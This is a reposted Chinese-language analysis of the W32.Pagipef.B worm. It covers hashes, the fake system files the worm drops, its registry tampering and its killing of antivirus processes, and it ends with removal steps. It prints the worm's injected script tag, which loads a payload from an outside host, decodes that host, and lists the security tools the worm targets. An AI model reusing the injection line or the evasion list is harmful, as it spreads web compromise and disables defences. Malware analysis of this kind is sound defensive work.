鸿 网 互 联 www.68idc.cn

pagefile.pif (W32.Pagipef.B)推荐

来源:互联网 作者:佚名 时间:2018-02-10 16:35
Aditional Information File size: 69632 bytes MD5: 86ae07b7f81a35f268d11fe39a090a50 SHA1: a09329ed3d8b729372f01819b30c3004011e04ee CRC32 : 84E8D7FA RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9 SHA160 : A09329ED3D8B729372F01819B30C3004
  Aditional Information
File size: 69632 bytes
MD5: 86ae07b7f81a35f268d11fe39a090a50
SHA1: a09329ed3d8b729372f01819b30c3004011e04ee
CRC32  : 84E8D7FA
RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9
SHA160  : A09329ED3D8B729372F01819B30C3004011E04EE
packers: BINARYRES, FSG
Languages:Microsoft Visual C++ 6.0   运行,释放:   %Systemroot%\system32\Com\lsass.exe  69632 字节  (RHSA) %Systemroot%\system32\Com\smss.exe  9261 字节 每个分区(C—F)下的Autorun.inf和pagefile.pif   貌似不支持U盘传播 =.=`(至少没跟踪到)   修改注册表:     (用了另类方法破坏“显示隐藏文件”功能)   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden 的ShowSuperHidden值修改为0(原本为1)   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden 的Type值写入乱码(原为checkbox)   假冒系统文件的lsass.exe 和smss.exe (路径为%Systemroot%\system32\Com\)``   使用双进程守护技术```   监视对方的存在和自身同党、注册表项等``如被修改或删除,则重写````   并尝试关闭下列关键字:   process 安全卫士  进程  卡巴  瑞星  毒霸  杀毒  江民  softice virus  symantec  regedit   汗``连反汇编工具都不放过`````!   后遍历磁盘,查找扩展名为jsp php spx asp tml htm的,插入一段代码:   script src="h**p://%78%77%2E%6D%6F%76%37%38%2E%63%6F%6D/%62%32%2E%61%73%70" /script   解密后得:   h**p://xw.mov78.com/b2.asp   由于时间关闭,并未光临该网站,我猜一定有很多好玩的东西````   最后还感染了除系统盘和Windows目录的所有EXE文件``从D盘开始`````   感染方式为捆绑``多了2个MZ头,应该是那2个狼狈为**假冒系统文件的东东吧``   没有深入跟踪```自己也不清楚````` :Q     解决方法:       [url]http://gudugengkekao.ys168.com/[/url]下载: 图片点击可在新窗口打开查看PowerRmv.com 101KB   下不了的,自己去网上找````   放到桌面,关闭不需要的进程```断开网络``   打开PowerRmv,选上“抑制对象生成”,填入(一次一个,后面不要有空格):   C:\Windows\system32\Com\lsass.exe C:\Windows\system32\Com\smss.exe C:\AUTORUN.INF C:\pagefile.pif D:\AUTORUN.INF D:\pagefile.pif E:\AUTORUN.INF E:\pagefile.pif F:\AUTORUN.INF F:\pagefile.pif   打开注册表,把上面提到的键值改回来```ShowSuperHidden和Type值```   然后升级杀软,全盘扫``修复被感染的EXE文件```   (捆绑方式的,修复成功率应该很高吧?。。。)    

图片点击可在新窗口打开查看


图片点击可在新窗口打开查看


图片点击可在新窗口打开查看


图片点击可在新窗口打开查看
网友评论
<